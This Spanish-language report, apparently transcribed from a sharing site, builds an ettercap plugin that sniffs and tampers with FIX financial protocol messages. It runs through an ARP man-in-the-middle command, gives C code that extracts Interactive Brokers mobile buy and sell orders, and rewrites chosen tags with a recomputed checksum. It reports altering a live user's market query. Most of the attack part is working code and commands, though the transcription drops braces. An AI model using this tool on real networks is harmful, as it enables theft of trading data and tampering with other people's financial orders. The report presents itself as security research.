Sniffing a protocolos FIX
|
|
- Gabriel Correa Soto
- hace 8 años
- Vistas:
Transcripción
1 Sniffing a protocolos FIX Programando un Plug-In para ettercap Adrián Portabales Goberna
2 1. Introducción Protocolos FIX: The Financial Information exchange (FIX) protocol is an electronic communications protocol initiated in 1992 for international real-time exchange of information related to the securities transactions and markets. With trillions of dollars traded annually on the NASDAQ alone, financial service entities are investing heavily in optimizing electronic trading and employing direct market access (DMA) to increase their speed to financial markets. Managing the delivery of trading applications and keeping latency low increasingly requires an understanding of the FIX protocol. Wikipedia. 1.2 Quien usa FIX? Se dice que almenos en el 90% de las operaciones electrónicas financieras. En la web nos encontramos un listado con las empresas que adoptan este protocolo. Instituciones, brokers/dealers, mercados financieros, bancos, fondos de inversión son los clientes típicos de este protocolo. En el siguiente imagen se expone un diagrama de un sistema FIX:
3 1.3 Mensajes FIX Los mensaje FIX es una serie de campos CLAVE=VALOR delimitados por el carácter ASCII 01 <start of header> (SOH). Esta compuesto por una cabecera, un cuerpo y un final. Por ejemplo en la versión 4.4 de FIX, la cabecera contendrá estos tres campos: 1. 8 (BeginString) 2. 9 (BodyLength) (MsgType) El cuerpo del mensaje es totalmente dependiente del tipo del mensaje definido en la cabecera. El ultimo campo del mensaje siempre sera el TAG 10 (Checksum) y estará compuesto por tres números (E.J.: 10=021). Por tanto y como decíamos el mensaje final sera la composición de estas tres partes. Un ejemplo de un mensaje entero podría ser algo tal que así: 8=FIX.4.2 9=178 35=8 49=PHLX 56=PERS 52= :30: =ATOMNOCCC =3 150=E 39=E 55=MSFT 167=CS 54=1 38=15 40=2 44=15 58=PHLX EQUITY TESTING 59=0 47=C 32=0 31=0 151=15 14=0 6=0 10=128 (sustituyendo la barra por el carácter <SOH>) 1.4 Conclusión Introducción Nos encontramos con un protocolo fundamental para el sistema actual donde se sustenta toda la economía de países, empresas etc. Ante este escenario, Podríamos decir que el protocolo FIX es seguro? Depende. Y es que la poca información que nos encontramos en internet sobre la seguridad de este protocolo y posibles ataques es NULA. Esto deja un camino muy grande por donde investigar. Que podríamos investigar? Vulnerabilidades en el software. Posibles riesgos de penetración y ataques DOS. Sniffing y parsing de mensajes. Y hasta donde la imaginación nos de... En este report nos centraremos en el Sniffing y parsing de mensajes. No existe nada en la red donde nos facilite esta tarea, así que nos centraremos en la programación de un Plug-In para el archiconocido Ettercap. Para esta tarea también podríamos programar, que seria lo lógico si quisiesemos simplemente representar los datos que viajan en la red, un dissector; Pero es que lo vamos a llevar mas allá e intentaremos modificar los datos que se envían.
4 2.Programando un Plug-In para Ettercap. Ettercap nos da la posibilidad de activar o desactivar plugins al vuelo, bajo demanda de lo que necesitemos. De serie ya trae diversos plugins instalados, además de un esqueleto para la programación de uno nuevo (~plug-ins/dummy) En el siguiente link tendremos un pequeño tutorial con mas detalle y es que buscare simplificar este paso. Me he encontrado con diversos problemas y explicare como solucionarlos, buscando la máxima simpleza. En la web de ettercap tendremos el código fuente de todo el software necesario. Necesitaremos ciertas librerías para poder compilar el Ettercap (Explicado en el archivo README en la raiz de la carpeta ettercap, sección REQUIRED LIBRARIES) 2.1 Partiendo de dummy.c Recomiendo partir de este archivo, ya que es lo que necesitaremos para programar nuestro primer Plug-In. Tendremos un codigo comentado y listo para empezar. Si quereis crear un nuevo archivo, copiar todo (Junto con los Makefile) a una nueva carpeta, y dentro de Makefile hacer un replace de las cadena dummy.c por el nombre de vuestro nuevo fichero. 2.2 Manos a la obra: Creación de fix_bump.c Que es fix_bump? Un plugin que detecta y modifica mensajes FIX. Como lo hace? Expliquemoslo: La primera parte del archivo sera las cabeceras necesarias para las funciones y estructuras del ettercap: #include <ec.h> #include <ec_plugins.h> #include <ec_packet.h> #include <ec_hook.h> Luego definiremos los prototipos y el registro del plugin: /* prototypes */ int plugin_load(void *); static int fix_bump_init(void *); static int fix_bump_fini(void *); static void fix_bump(struct packet_object *po); struct plugin_ops fix_bump_ops = { ettercap_version: EC_VERSION, name: "fix_bump", info: "Detect and modify data in fix protocol", version: "0.1", init: &fix_bump_init, fini: &fix_bump_fini, ; int plugin_load(void *handle){ return plugin_register(handle, &fix_bump_ops); static int fix_bump_init(void *dummy){ USER_MSG("fix_bump: plugin running...\n"); hook_add(hook_packet_tcp, &fix_bump); return PLUGIN_RUNNING;
5 static int fix_bump_fini(void *dummy){ USER_MSG("fix_bump: plugin terminated...\n"); hook_del(hook_packet_tcp, &fix_bump); return PLUGIN_FINISHED; La segunda parte del archivo sera la función donde se encontrara el algoritmo de nuestro plugin, la primera versión solo servirá para rastrear los mensajes FIX y lo definiremos así: static void fix_bump(struct packet_object *po){ char tmp1[max_ascii_addr_len]; char tmp2[max_ascii_addr_len]; if (po->data.disp_len!= 0 && strstr(po->data.disp_data, "8=FIX")){ USER_MSG("Conexion: %s -> %s [%d]\n",ip_addr_ntoa(&po->l3.src, tmp1), ip_addr_ntoa(&po- >L3.dst, tmp2), ntohs(po->l4.dst)); USER_MSG("Mensaje Fix: %s\n",po->data.data); Esta pequeña función en C lo que hará sera usar la estructura packet_object (mas información de como están definidas las estructuras de ettercap aquí) para buscar en los datos del todos los paquetes de la red el string 8=FIX que sera el identificativo de un mensaje FIX. Una vez encontrado el mensaje se imprimirá la conexión (ip fuente ip destino [puerto]) y el mensaje en si. Compilando esto ya tendremos un plugin funcional y podrás leer todos los mensajes FIX no encriptados. Si queremos ejecutarlo recomiendo usar el siguiente comando: sudo ettercap -T -M arp:remote -i eth0 // // -q -P fix_bump Los comandos ejecutados son los siguientes: -T: Usar modo texto -M <METHOD:ARGS>: Seleccionar un man in the middle attack arp -i <iface>: Interfaz de red donde esta conectado nuestro pc -q: Modo quiet, no imprima nada -P <plugin>: Iniciar Plug-In Ejemplo de salida:
6 2.3 Resaltando las compras de un broker real. Y si estamos en una red donde se use distintos brokers, y queremos resaltar las compras de acciones, Podemos? Por supuesto. En esta prueba de concepto usare la aplicación movil de Interactive Brokers (mobiletws), es decir, un software real usado por miles de profesionales del Trading. El motivo de usar la aplicación móvil es que la aplicación de escritorio cifran ciertos campos (que no todos) mientras que en la aplicación móvil apenas se cifran nada (Muy mala practica..) Primero haremos el parsing en nuestro Plug-In, modificaremos la función principal con el siguiente código: char *tmp,*tipocompra,compra[10],*compra2,cantidad[10],*cantidad2; if (po->data.disp_len!= 0 && strstr(po->data.disp_data, "8=FIX")){ USER_MSG("Conexion %s -> %s [%d]\n",ip_addr_ntoa(&po->l3.src, tmp1), ip_addr_ntoa(&po- >L3.dst, tmp2), ntohs(po->l4.dst)); USER_MSG("\t%s\n",po->DATA.data); tmp = strdup(po->data.disp_data); compra2 = strstr(tmp, "7104="); if (compra2!= NULL){ compra2 = compra2+5; memset(compra,0,sizeof(compra)); memcpy(compra,compra2, searchsoh(compra2)); if(strstr(tmp, "54=")[3]==66) tipocompra="compra"; else if (strstr(tmp, "54=")[3]==83) tipocompra="venta"; cantidad2 = (strstr(tmp, "151=")+4); memset(cantidad,0,sizeof(cantidad)); memcpy(cantidad,cantidad2, searchsoh(cantidad2)); USER_MSG("Operacion detectada!!\n \t Tipo: %s ",tipocompra); USER_MSG("Precio: \t %s \t",compra); USER_MSG("Cantidad: \t %s \t ",cantidad); USER_MSG("\n"); Buscaremos el tag 7104 ya que he descubierto que es el que usa Interactive Brokers (de aquí en adelante IB) para las compras. Si existe ese tag en el mensaje es que se esta efectuando una compra o venta de acciones. En la programación de un plugin de Ettercap siempre deberemos inicializar una variable del tipo char * var[] con la llamada al sistema memset() si no tendremos un Segmentation Fault. Toda la lógica de este pequeño código es para la representación de los datos obtenidos. Ejemplo de compra de acciones:
7 Operamos primero en el móvil. Y vemos la operación en nuestra pantalla del PC: 2.4 Una vuelta de tuerca, Y si queremos modificar los mensajes que se envían? Supongo que a la altura de este report puedes pensar, Esto mismo no se se puede hacer con un filtro del ettercap? Efectivamente, hasta llegado a este punto. Y es que cuando modificamos alguna cadena en un mensaje FIX el valor del CheckSum cambiara, por tanto necesitaríamos recalcularlo o la aplicación nos dará error. Por tanto he creado las siguientes funciones para para poder modificar los valores de los mensajes, añadiendo al final el nuevo CheckSum recalculado.
8 Función para recalcular el nuevo CheckSum. Gracias a este link, donde encontraremos toda la información necesaria. char *GenerateCheckSum( char *buf, long buflen ) { static char tmpbuf[ 4 ]; long idx; unsigned int cks; for( idx = 0L, cks = 0; idx < buflen; cks += (unsigned int)buf[ idx++ ] ); sprintf( tmpbuf, "%03d", (unsigned int)( cks % 256 ) ); return( tmpbuf ); Funciones Auxiliares: //Funcion que que busca el modulo del checksum a partir de una cadena con checksum. //Devuelve un int que sera el modulo de la funcion GenerateCheckSum long calcularchecksum(char *cadena,char *valor_a_comprobar){ long i=0; while(1){ if (strcmp(generatechecksum(cadena,i),valor_a_comprobar)==0) break; i++; return i; //Quita el checksum de una cadena, devolviendo la cadena por la variable salida sin el checksum. Devuelve el checksum eliminado char *quitarchecksum(char *cadena,char *salida,char checksum[]){ int i; i = strlen(cadena)-2; while(cadena[i]!=0x01){ i--; i++; strcpy(salida,cadena); salida[i] = '\0'; int j; int f=0; while(strlen(cadena)>i+3){ j =i+3; if(cadena[j]==0x01) break; checksum[f]=cadena[j]; i++; f++; return checksum; //Busca el primer caracter SOH de una cadena dada int *searchsoh(char *cadena){ int i=0; while(i<strlen(cadena)){ if (cadena[i]==0x01){break; i++; return i;
9 Función Principal static void fix_bump(struct packet_object *po){ char *tmp,*tmp3,*tipocompra,compra[10],tag[10],*compra2,cantidad[10],*cantidad2; char a[6]; char nuevovalor[256],valorviejo[20]; int i=0,j=0; char tmp1[max_ascii_addr_len]; char tmp2[max_ascii_addr_len]; if (!(po->flags & PO_FORWARDABLE)) return PLUGIN_FINISHED; if (GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("fix_bump: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; if (po->data.disp_len!= 0 && strstr(po->data.disp_data, "8=FIX")){ USER_MSG("Conexion %s -> %s [%d]\n",ip_addr_ntoa(&po->l3.src, tmp1), ip_addr_ntoa(&po- >L3.dst, tmp2), ntohs(po->l4.dst)); USER_MSG("\t%s\n",po->DATA.data); tmp = strdup(po->data.disp_data); memset(a, 0, sizeof(a)); //GBL_OPTIONS->quiet = 1; ui_input("\ndesea modificar el mensaje? 1-Si 0-No : ", a, sizeof(a), NULL); if (strcmp(a,"1")==0){ memset(nuevovalor, 0, sizeof(nuevovalor)); ui_input("introduzca el tag a modificar con la estructura CLAVE=VALOR : ", nuevovalor, sizeof(nuevovalor), NULL); char salida[512]; char checksum[150]; memset(salida, 0, sizeof(salida)); memset(checksum, 0, sizeof(checksum)); quitarchecksum(tmp,salida,checksum); long nuevomodulochecksum=calcularchecksum(salida,checksum); memset(tag,0,sizeof(tag)); memcpy(tag,nuevovalor, searchequals(nuevovalor)); //Buscamos la CLAVE=VALOR vieja que vamos a remplazar memset(valorviejo,0,sizeof(valorviejo)); tmp3 = strstr(tmp,tag); memcpy(valorviejo,tmp3,searchsoh(tmp3)); strcpy(salida,replace_str(salida,valorviejo,nuevovalor)); char *nuevochecksum=generatechecksum(salida,nuevomodulochecksum); //Concatenamos con el nuevo checksum strcat(salida,"10="); strcat(salida,nuevochecksum); //Anhadimos al final el caracter <SOH> int tam = strlen(salida); salida[tam]=0x01; salida[tam+1]='\0'; USER_MSG("\n\n\n%s\n",salida ); USER_MSG("%s\n\n\n\n",po->DATA.disp_data); memcpy(po->data.disp_data,salida,strlen(salida)-9); memcpy(po->data.data,salida,strlen(salida)-9); //po->data.disp_data=salida; //str_replace(&po->data.disp_data, po->data.disp_data, "otra forma de reemplazar"); //Flag de paquete modificado
10 po->flags = PO_MODIFIED; size_t max_len; max_len = GBL_IFACE->mtu - (po->l4.header - (po->packet + po->l2.len) + po->l4.len); /* the packet has exceeded the MTU */ if (po->data.len > max_len) { po->data.inject = po->data.data + max_len; po->data.inject_len = po->data.len - max_len; po->data.delta -= po->data.len - max_len; po->data.len = max_len; USER_MSG("que envia: %s\n\n\n\n",po->data.disp_data); USER_MSG("que envia: %s\n\n\n\n",po->data.data); Se ha modificado la función principal para que una vez detectado un mensaje FIX pregunte al usuario con la función ui_input implementada en ettercap si desea modificar el mensaje. En caso afirmativo se propone que se introduzca un string de la forma TAG=VALOR que sera el nuevo valor del tag elegido. Cambien se hacen las operaciones necesarias para eliminar el viejo checksum y añadir el nuevo. Parámetros a destacar para ettercap: GBL_OPTIONS->quiet = 1; Se usara para no imprimir nada mientras se interactué con la consola. po->flags = PO_MODIFIED; Para cuando se modifique el paquete. La forma de introducir un valor a ettercap, sera inicializando la variable con memset.
11 Ejemplo de ejecución (Usuario busca el índice IBEX y se lo cambiamos por la acción Facebook $FB):
12 El trafico en la red: Observamos que Paquete 32 es el cliente, el cual redirige su trafico hacia mi tarjeta de red (ya que estamos creando un MITM) y luego el Paquete 33 ya se redirige al router con la información cambiada. Imagen 1: Lo que envia el usuario Imagen 2: Como se modifica.
13 Bibliografia: urity_tools/developing_dissectors_and_plug-ins_for_the_ettercap_network_sniffer#networkst- CHP-2-FIG-2
AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7
Tutoriales de ayuda e información para todos los niveles AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7 Como agregar a una red existente un equipo con Windows 7 y compartir sus archivos
Más detallesObjetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero.
Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero. Uso de Ficheros Todas las estructuras de datos vistas hasta ahora utilizan la
Más detallesInternet Information Server
Internet Information Server Internet Information Server (IIS) es el servidor de páginas web avanzado de la plataforma Windows. Se distribuye gratuitamente junto con las versiones de Windows basadas en
Más detallesCombinar correspondencia (I)
Combinar correspondencia (I) Mediante la opción Combinar correspondencia Word2007 nos permite incluir en un documento, datos almacenados en otro sitio. De esta forma podremos obtener copias de un mismo
Más detallesGUIA PRÁCTICA PARA LA FIRMA DIGITAL DE UN PDF A PARTIR DE UN PDF CREADO POR TI.
GUIA PRÁCTICA PARA LA FIRMA DIGITAL DE UN PDF A PARTIR DE UN PDF CREADO POR TI. AUTOR: 1 INTRODUCCIÓN Con la entrada en vigor de la reforma de la LEC, los profesionales, letrados y procuradores, nos vemos
Más detallesMANUAL DE USUARIO. Convocatoria 2011 Fundación para la Prevención de Riesgos Laborales IT-0130/2011 Implementa-T
Convocatoria 2011 Fundación para la Prevención de Riesgos Laborales IT-0130/2011 Implementa-T MANUAL DE USUARIO Herramienta de Autogestión de Prevención de Riesgos Laborales para la PYME Jiennense Dep.
Más detallesInstalar y configurar W3 Total Cache
Instalar y configurar W3 Total Cache en WordPress Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com La velocidad de carga de una web influye mucho a la hora de mejorar el
Más detallesEjercicios - Persistencia en Android: ficheros y SQLite
Ejercicios - Persistencia en Android: ficheros y SQLite Índice 1 Uso de ficheros (0.5 puntos)...2 2 Persistencia con ficheros (0.5 puntos)...3 3 Base de datos: SQLiteOpenHelper (0.5 puntos)... 3 4 Base
Más detallesMANUAL TARIFICADOR. Clic aquí Descargar Tarificador
1 de 16 MANUAL TARIFICADOR A continuación encontrara un Paso a Paso de la instalación del tarificador. 1 PASO. Digite en su navegador esta dirección : www.hablaporinternet.com; encontrara la siguiente
Más detallesProceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento
Qué es AT-Encrypt nos permitirá dotar de contraseña a cualquier documento o carpeta. Este documento o carpeta sólo será legible por aquel que conozca la contraseña El funcionamiento del cifrado (o encriptación)
Más detallesMANUAL TARIFICADOR A continuación encontrara un Paso a Paso de la instalación del tarificador.
1 de 16 MANUAL TARIFICADOR A continuación encontrara un Paso a Paso de la instalación del tarificador. 1 PASO. Ejecutar el instalador " TARIFICADOR SHOP SERVICE TECHNOLOGIES " doble click Ejecutando el
Más detallesESCUELA SUPERIOR DE INFORMATICA Prácticas de Estadística UNA SESIÓN EN SPSS
UNA SESIÓN EN SPSS INTRODUCCIÓN. SPSS (Statistical Product and Service Solutions) es un paquete estadístico orientado, en principio, al ámbito de aplicación de las Ciencias sociales, es uno de las herramientas
Más detallesExamen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1
Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1 ÍNDICE ÍNDICE... 1 1.1 Ejercicio 1: Máquina Expendedora (3.5 ptos.)... 1 1.2 Ejercicio 2: Clase Circulo (1.0 pto.)... 3 1.3 Ejercicio
Más detallesIptables, herramienta para controlar el tráfico de un servidor
Iptables, herramienta para controlar el tráfico de un servidor La seguridad es punto muy importante a tener en cuenta en cualquier organización de ahí que sea fundamental hacer uso de aquellos mecanismos
Más detallesT3-Rondas V 1.1. Help-Pc, S.L. C/ Pintor Pau Roig, 39 L-5 08330 Premià de Mar Barcelona Tel. (93) 754 90 19 Fax 93 752 35 18 marketing@t2app.
T3-Rondas V 1.1 1 Indice 1 Requisitos mínimos 3 2 Instalación 3 2.1 Instalación del software 3 2.2 Instalación del terminal 4 3 Configuración Inicial 4 3.1 Crear terminales 5 3.2 Crear puntos de lectura
Más detallesGVisualPDA Módulo de Almacén
GVisualPDA Módulo de Almacén GVisualPDA es una aplicación para Windows Mobile 5/6 que amplía más aún las posibilidades de integración del software de gestión GVisualRec permitiendo estar conectados en
Más detallesMANUAL BÁSICO PARA CLIENTES
2011 MANUAL BÁSICO PARA CLIENTES DEPARTAMENTO TÉCNICO COMENERSOL WIRELESS ÍNDICE Paso 0: Qué hacer cuando internet no funciona....3 Paso 1: Comprobar que la antena está bien conectada..4 Paso 2: Comprobar
Más detallesEn cualquier caso, tampoco es demasiado importante el significado de la "B", si es que lo tiene, lo interesante realmente es el algoritmo.
Arboles-B Características Los árboles-b son árboles de búsqueda. La "B" probablemente se debe a que el algoritmo fue desarrollado por "Rudolf Bayer" y "Eduard M. McCreight", que trabajan para la empresa
Más detallesCreando una webquests
Creando una webquests 1. LO PRIMERO EL PROGRAMA Para crear paginas web necesitamos el software apropiado. Hay muchas formas y programas para hacerlo, pero por su facilidad de uso y por ser software libre
Más detallesConfiguración en Red
Configuración en Red Si se ha adquirido este módulo posteriormente al programa OPTISYS, antes que nada, se deberá configurar la Naranja USB, con una nueva clave de actualización proporcionada por Lemon
Más detallesServicios Educativos Del Estado De Chihuahua Sistema Integral de Presupuestos y Materiales. Indice. Introducción... 2. Barra de Herramientas...
Indice Página Introducción... 2 Acceso al Sistema... 3 Barra de Herramientas... 4 Menú Principal... 5 Operación Catálogos Reportes Consultas Entradas Por Orden de Compra... 6 Entradas Directas... 8 Salidas
Más detallesTÉCNICAS DE GESTIÓN ADMINISTRATIVA PARA PEQUEÑAS EMPRESAS
COMBINAR CORRESPONDENCIA CON OFFICE 2003 Combinar correspondencia nos permite incluir en un documento datos almacenados en otro lugar. De esta forma podremos obtener copias de un mismo documento pero con
Más detallesSistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2
Sistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2 Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www.acens.com Introducción Actualmente una de las formas más utilizadas para conectarse
Más detallesGuía Rápida de Inicio
Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for SharePoint. Para disponer de instrucciones detalladas, por favor, diríjase
Más detallesAGREGAR COMPONENTES ADICIONALES DE WINDOWS
INSTALACIÓN DE IIS EN WINDOWS XP El sistema está desarrollado para ejecutarse bajo la plataforma IIS de Windows XP. Por esta razón, incluimos la instalación de IIS (Servidor de Web) para la correcta ejecución
Más detallesManual CMS Mobincube
Manual CMS Mobincube CMS Mobincube Qué es? El CMS (Sistema de Gestión de Contenidos) es un completo website que permite la creación y actualización de contenido remoto. De esta forma, una vez creada una
Más detallesCómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia
Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com La puesta en marcha de WordPress es muy sencilla,
Más detallesArchivo de correo con Microsoft Outlook contra Exchange Server
Archivo de correo con Microsoft Outlook contra Exchange Server Resumen Con este proceso de archivado, lo que pretendemos es guardar nuestro correo en un archivo de datos, para así poder realizar una copia
Más detallesControl de accesos autónomo por huella dactilar
Manual de software Control de accesos autónomo por huella dactilar Access FP (SOFTWARE PARA LECTOR DE HUELLA DACTILAR SIMON ALERT REF.: 8902003-039) (Versión de sofware 1.1) (Versión de documento 1.2)
Más detallesQuitar de un Directorio Activo Un Servidor que es el Maestro de Operaciones En Windows 2000 Server y Windows Server 2003
Quitar de un Directorio Activo Un Servidor que es el Maestro de Operaciones En Windows 2000 Server y Windows Server 2003 Josep Ros Suprimir un Maestro de Operaciones de Directorio Activo Introducción La
Más detallesWINDOWS 2008 5: TERMINAL SERVER
WINDOWS 2008 5: TERMINAL SERVER 1.- INTRODUCCION: Terminal Server proporciona una interfaz de usuario gráfica de Windows a equipos remotos a través de conexiones en una red local o a través de Internet.
Más detallesIntroducción a la Programación en MATLAB
Introducción a la Programación en MATLAB La programación en MATLAB se realiza básicamente sobre archivos M, o M-Files. Se los denomina de esta forma debido a su extensión.m. Estos archivos son simple archivos
Más detallesInstalación de Microsoft Virtual PC
Instalación de Microsoft Virtual PC Virtual PC es un software de Microsoft que permite instalar varios sistemas operativos en la misma máquina, sin tener que reiniciar Windows y además de forma segura,
Más detallesPractica A. Crear y Administrar Grupos
Practica A Crear y Administrar Grupos Los grupos simplifican la administración ya que permiten dar permisos a grupos de usuarios en vez de uno a uno. Antes de comenzar a utilizar los grupos hay que entender
Más detallesAcá vamos a ocuparnos de cómo realizar la instalación de una red intra-aula sobre Linux, concretamente en la distribución de GNU/Linux Ubuntu 9.04.
Instalación de una red intra-aula sobre Linux (Ubuntu 9.04) Introducción La idea y la fundamentación de la creación de redes intra-aula, se puede encontrar en el siguiente enlace: http://www.fedaro.info/2009/06/29/redes-intra-aula/
Más detallesREDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS
REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS Escritorio remoto - 1 - Escritorio Remoto...- 3 - Definición de Escritorio Remoto... - 3 - Habilitar Escritorio Remoto... - 4 - Instalación del
Más detallesCITRIX 4.5 - Citrix Application Streaming
1 de 39 01/12/2007 1:06 CITRIX 4.5 - Citrix Application Streaming Es la caracteristica principal de la versión 4.5 de Citrix, el Application Streaming, en este documento se explica cómo usarlo. Application
Más detalles5.2.- Configuración de un Servidor DHCP en Windows 2003 Server
5.2.- Configuración de un Servidor DHCP en Windows 2003 Server En este apartado vamos a configurar el servidor DHCP de "Windows 2003 Server", instalado en el apartado anterior. Lo primero que hemos de
Más detalles1. Ejemplo de clase : La clase Cuenta 2. Uso de la clase Cuenta. 3. Métodos y objetos receptores de mensajes (Importante)
1. : La clase Cuenta. Uso de la clase Cuenta 3. Métodos y objetos receptores de mensajes (Importante) 1 Una clase para cuentas de un banco Vamos a modelar con una clase, un nuevo tipo de datos, donde los
Más detallesKaspersky Endpoint Security 10 - versión para casa
Kaspersky Endpoint Security 10 - versión para casa Como trabajadores de la UMA se ha llegado a un acuerdo con Kaspersky para que podamos disfrutar de un antivirus completo y con licencia en nuestros ordenadores
Más detallesCómo capturar páginas web con el programa GNU Wget
Cómo capturar páginas web con el programa GNU Wget Raúl Araya, Judit Feliu, Mercedes Suárez {raul.araya; judit.feliu; mercedes.suarez}@iula.upf.es Qué es GNU Wget? Una utilidad de código abierto (GNU)
Más detallesManual del programador
Apéndice A Manual del programador A.1. Introducción En este capítulo vamos a dar un repaso general a toda la estructura que compone la aplicación de forma que el usuario se familiarice con ella y sobre
Más detallesefactura Online La fibra no tiene competencia
Manual efactura Online La fibra no tiene competencia ÍNDICE efactura Online Interface de efactura Online Barra Superior Área de Trabajo. Pestañas Empresas Personalizar factura Clientes Facturar Crear una
Más detallesTipos de conexiones de red en software de virtualizacio n: VirtualBox y VMware
Tipos de conexiones de red en software de virtualizacio n: VirtualBox y VMware 1. Tipos de conexiones de red Los software de virtualización son programas que se utilizan para crear y manejar máquinas virtuales,
Más detallesPruebas de unidad con JUnit
Pruebas de unidad con JUnit Cuando se implementa software, resulta recomendable comprobar que el código que hemos escrito funciona correctamente. Para ello, implementamos pruebas que verifican que nuestro
Más detallesFicheros de configuración de Nagios (ejemplo con nrpe y snmp)
How-to sobre Nagios Realizado por Eugenio Fuentefría Oróns Índice. Qué es Nagios? Funcionalidades de Nagios Equipos usados para las pruebas Instalación de Nagios. Uso de Nagios Modos de extraer información
Más detallesCurso de PHP con MySQL Gratis
Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este
Más detallesCUPS Administración de impresora
Rocío Alt. Abreu Ortiz 2009-3393 CUPS Administración de impresora Common Unix Printing System (Sistema de impresión común de Unix, abreviado CUPS) es un sistema de impresión modular para sistemas operativos
Más detallesCONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD
CONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD Carpetas sin Conexión... 2 Gestión de mensajes enviados... 3 Gestión de mensajes eliminados... 6 Firma Digital... 8 Envío de mensajes firmados digitalmente...
Más detallesTUTORIAL ENVIO SMS MASIVOS. 1. Segmentación de la base de datos de clientes
TUTORIAL ENVIO SMS MASIVOS Para hacer uso de la utilidad de envío de SMS se tendrán en cuenta 3 puntos: 1. Segmentación de la base de datos de clientes, para determinar a quién va dirigido 2. Diferentes
Más detallesEl protocolo IMAP ofrece la descarga de correos en modo sólo lectura, es decir descarga sólo una copia del correo y no permite el borrado.
Manual de Configuración de correo en Android Utilizar POP o IMAP? Existen dos formas de configurar su cuenta de correo en dispositivos móviles, la primera es POP y la segunda es IMAP El protocolo POP es
Más detallesRedirección de puertos
1 Redirección de Puertos Redirección de puertos 2 Redirección de Puertos Índice 1. Introducción 3 2. Requisitos necesarios para redireccionar puertos en el router 6 3. Redireccionamiento de puertos 9 4.
Más detallesPaso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1.
Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1. Anjuta es un entorno de desarrollo de C que podemos encontrar en cualquier distribución de GNU/Linux. Si nuestra distribución no dispone de ella,
Más detallesTutorial: Primeros Pasos con Subversion
Tutorial: Primeros Pasos con Subversion Introducción Subversion es un sistema de control de versiones open source. Corre en distintos sistemas operativos y su principal interfaz con el usuario es a través
Más detallesMANUAL DE FACTURACIÓN TOUCH SCREEN
MANUAL DE FACTURACIÓN TOUCH SCREEN Tabla de Contenido Contenido Pág. CAPITULO 1... 3 CARACTERÍSTICAS Y BENEFICIOS... 3 CAPITULO 2... 4 ENTRADAS Y SALIDAS DEL MODULO... 4 Visión general... 4 Contenido del
Más detallesMANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD
MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...
Más detallesMANUAL DE USUARIO TARIFICADOR SIPTAR Y REPORTES SIPTAR.
MANUAL DE USUARIO TARIFICADOR SIPTAR Y REPORTES SIPTAR. Fecha: Septiembre del 2006. CONTENIDO CONTENIDO...2 1. Ingreso al Tarificador SipTar....3 2. Utilidades del SipTar...5 3. Monitoreo Cabinas...18
Más detallesEttercap: Para instalación en ambientes Linux (aunque la mayoría de distribuciones ya las trae instaladas):
Ettercap: Este programa que nos permite sniffear el tráfico de red (capturar conversaciones, lectura de paquetes) y obtener así las contraseñas escritas por otros usuarios de nuestra red. Con el uso de
Más detallesProf. Dr. Paul Bustamante
Prácticas de C++ Practica Nº 10 Informática II Fundamentos de Programación Prof. Dr. Paul Bustamante INDICE 1.1 EJERCICIO 1: MI PRIMER FICHERO EN BINARIO... 1 1.2 EJERCICIO 2: LEYENDO MI PRIMER FICHERO
Más detallesACCESO AL SERVIDOR EXCHANGE MEDIANTE OWA
ACCESO AL SERVIDOR EXCHANGE MEDIANTE OWA El Acceso al correo a través de OWA (Outlook Web Access) es una herramienta que permite a los usuarios consultar sus mensajes en una interfaz Web a través de un
Más detallesPrograma de encriptación WIFI.
Programa de encriptación WIFI. En qué consiste la aplicación? Se trata de un programa que permite encriptar automáticamente la señal wifi del Cable MODEM router de ONO. Dónde se encuentra la aplicación?
Más detallesPráctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark
FUNDAMENTOS DE REDES DE COMPUTADORES Curso 2009/2010 Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark Introducción En esta práctica vamos a trabajar
Más detallesSIEWEB. La intranet corporativa de SIE
La intranet corporativa de SIE por ALBA Software Acceso a los servicios SIE desde páginas Web para los usuarios de sistema *. Administración del Sistema (cuentas de usuarios, permisos, servicios, etc...)
Más detallesProgramación Gráfica 2D ( IV ) Tilemapping.
Autor: Sergio Hidalgo serhid@wired-weasel.com Introducción Programación Gráfica 2D ( IV ) Tilemapping. Con el último tutorial ya terminé de explicar el funcionamiento de SDL y la programación gráfica en
Más detallesRESUMEN DE CONCEPTOS BASICOS DE PROGRAMACION JAVA
